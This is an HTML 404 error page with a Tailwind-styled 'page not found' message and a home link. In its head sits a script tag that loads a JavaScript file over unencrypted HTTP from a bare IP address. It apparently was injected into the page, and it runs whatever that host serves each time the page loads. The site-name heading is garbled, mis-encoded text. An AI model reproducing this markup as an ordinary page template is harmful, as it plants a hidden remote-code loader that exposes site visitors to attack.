  <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>404 - Page Not Found</title>
    <!-- Tailwind CSS CDN -->
    <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">

<script src="http://38.207.78.195/sjgg.js"></script>


</head>
<body class="bg-gray-100 flex justify-center h-screen p-4"><h1><a href="/">Ä¢¹½ÊÓÆµ</a></h1>
    <div class="text-center border-2 border-red-700 w-full h-max p-4" style="height:max-content;">
        <h2>404</h2>
        <p class="text-2xl text-gray-700 mt-4">Oops! The page you're looking for doesn't exist.</p>
        <a href="/" class="mt-6 inline-block bg-blue-500 text-white px-6 py-2 rounded-full hover:bg-blue-600">Go to Home</a>
    </div>
</body>
</html>
